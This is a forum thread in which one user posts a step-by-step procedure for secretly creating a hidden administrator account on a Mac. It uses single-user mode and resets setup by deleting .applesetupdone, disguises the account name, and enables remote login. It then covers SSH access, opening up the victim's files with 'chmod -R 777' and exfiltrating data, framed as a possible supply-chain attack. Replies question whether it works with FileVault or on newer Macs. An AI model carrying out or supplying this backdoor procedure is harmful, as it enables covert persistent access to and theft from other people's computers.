4 ms·
Notes added to demonstrate non-admin creation of the hidden account. 1. Force Mac to boot in "single user mode" (holding COMMAND-S at startup) 2. Command: d
by snakeroot 3y ago
Notes added to demonstrate non-admin creation of the hidden account.
1. Force Mac to boot in "single user mode" (holding COMMAND-S at startup)
2. Command: df - to determine which volume is the system volume
3. Command: mount -uw /dev/[volume] - to permit read/write access to system volume
4. Command: rm private/var/db/.applesetupdone - to force Mac to initiate setup process on reboot
5. Command: reboot - force reboot from "single user mode" command line
6. Wait for Apple setup assistant process to initiate. Skip any unnecessary steps
7. When prompted to create username, create user as .[username] - ._localized may be an example of obfuscation (best practice, change the User ID to ensure there is not a conflict)
8. Open System Preferences, select Sharing and enable "remote login"
9. Note the IP address of the target computer from Network Preferences OR using Command: ifconfig from Terminal
10. Reboot
11. The login screen now appears with no indication of hidden admin account or that the computer had been modified
12. The attacker may now use the attack machine to open terminal and enter "ssh ._localized@[target.ip.address]" and login via shell
13. The attacker may now perform any commands he/she wishes and can navigate to the target user's files and perform full exfiltration of data using a variety of widely documented tools
14. An example of gaining access could be using "sudo chmod -R 777 *" to make the target user's files accessible
15. The attacker has full access at this point, closing the computer (if a laptop) may even keep the connection active while the computer appears to be in sleep mode.
- codetrotter 3y ago> 1. Force Mac to boot in "single user mode" (holding COMMAND-S at startup) If you have physical access to the computer and they do not have disk encryption (FileVault on macOS) enabled then all bets are off anyways.
- snakeroot 3y agoTrue. However, if this is performed in the supply chain and made to appear after like it had never been configured (by removing the .applesetupdone), then the computer would be fully compromised before any encryption is applied.
- neximo64 3y agoIt's not possible to get into a Mac from step 2) Is this an old version of OS X? It does not work on Monterey or any of the M1/M2 Macs I have. Additionally FileVault doesn't let this work on the older macs too. It seems like you do need admin access in the first place, so its not really an attack.
- snakeroot 3y agodf to get the volume list, then ... mount -uw /dev/[Machintosh HD Volume] (by the way, I'd only be doing this on a Mac that I could restore and not care about my files - always back up)